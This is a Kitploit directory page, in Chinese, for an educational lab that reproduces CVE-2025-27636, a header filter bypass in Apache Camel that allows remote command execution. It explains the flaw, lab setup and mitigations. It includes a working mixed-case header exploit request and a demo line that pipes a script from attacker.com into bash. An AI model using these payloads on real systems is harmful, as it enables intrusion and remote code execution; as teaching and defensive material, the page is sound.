Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-27636-Practical-Lab — 动手实验,复现 CVE-2025-27636(Apache Camel 中因大小写敏感头过滤绕过导致的严重 RCE 漏洞)。演示如何通过头注入,利用 exec 端点执行任意命令。 | Kitploit
工具/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

动手实验,复现 CVE-2025-27636(Apache Camel 中因大小写敏感头过滤绕过导致的严重 RCE 漏洞)。演示如何通过头注入,利用 exec 端点执行任意命令。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
210个月前尚未审核
分享

🛡️ CVE-2025-27636 — Apache Camel 实战利用实验室

🔍 概述

CVE-2025-27636 是 Apache Camel 中一个严重的远程代码执行 (RCE) 漏洞,具体位于 camel-exec 组件。它源于一个微妙但危险的问题:

DefaultHeaderFilterStrategy 对标头名称执行区分大小写的检查,可以使用替代大小写来绕过。

这意味着内部 Camel 标头(例如 CamelExecCommandExecutable)如果大小写被篡改(例如 cAmeLexecCommandExecutable),本应被阻止的它们也可能通过。

当此标头到达 exec: 端点时,攻击者可以注入任意命令,导致系统完全沦陷。


📌 技术背景

✅

DefaultHeaderFilterStrategy

Apache Camel 的 DefaultHeaderFilterStrategy 旨在保护内部标头,例如:

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 如果大小写绕过过滤器则易受攻击

🔍 “内部”是什么意思? 内部标头是:

  • 以 Camel* 为前缀
  • 仅在 Camel 内部用于控制行为(路由、处理、端点)
  • 不打算暴露给外部系统,如 HTTP、JMS 等。

然而,在补丁之前,此过滤器区分大小写地匹配标头名称,这违反了 HTTP 规范(标头不区分大小写),并允许如下绕过:

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

此标头将被传递到 exec: 组件,然后执行有效载荷。

🛠️ CamelExecCommandExecutable

此标头告诉 camel-exec 组件要运行哪个命令。如果可由用户控制,它非常强大且极其危险,尤其是在支持操作系统级别命令(如 bash、cmd.exe 等)的环境中。


🧪 动手实验:Pinewood Server Diagnostic

项目:Pinewood Server Diagnostic 作者:@enochgitgamefied 目标:在真实的教育实验室中重现 CVE-2025-27636。


🔗 GitHub 仓库

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 项目概述

  • 使用 Apache Camel 4.10.0 构建
  • 路由:
    • /tasks → 使用 exec:tasklist 或 exec:ps 列出任务
    • /systeminfo → 输出操作系统信息(systeminfo 或 uname -a)
    • /network → 显示 ipconfig 或 ifconfig
  • Web UI 通过嵌入式 Jetty 在 / 上提供服务
  • 如果未修补过滤,则容易受到修改大小写的标头注入攻击

⚙️ 开始使用

root@kitploit:~
# Clone the repository
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Package the app
mvn clean package

# Run it
java -jar target/hello-camel-1.0-SNAPSHOT.jar

然后在浏览器中访问:

🖥️ http://<your-ip>:8484


🚨 演示漏洞

未修补的行为:

如果你发送如下标头(注意大小写):

root@kitploit:~
cAmeLexecCommandExecutable: whoami

过滤器不会阻止它,它会传递到 exec: 端点。你可以演示:

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← 危险

🎥 YouTube 演示

完整的演示正在准备中,即将上传。它将逐步介绍:

  • 应用程序设置
  • 标头注入
  • 命令执行
  • 修复步骤

YouTube 演示链接 **https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s**!


🛡️ 缓解与修复

  1. 升级 Apache Camel 到具有不区分大小写的标头过滤的版本(已修补)。
  2. 如果必须执行更严格的逻辑,请使用自定义 HeaderFilterStrategy。
  3. 除非完全锁定,否则不要将 exec: 路由直接暴露给 HTTP。

🧠 关键要点

  • 内部标头绝不能由外部用户控制。
  • 安全过滤器中的区分大小写是一个众所周知的反模式。
  • Apache Camel 很强大,但伴随力量而来的是责任——尤其是在将 HTTP 链接到 exec 时。

⚠️ 免责声明

本实验室仅用于教育和受控实验室目的。 切勿在未经授权的系统或网络上尝试此操作。

Apache Camel2
下载工具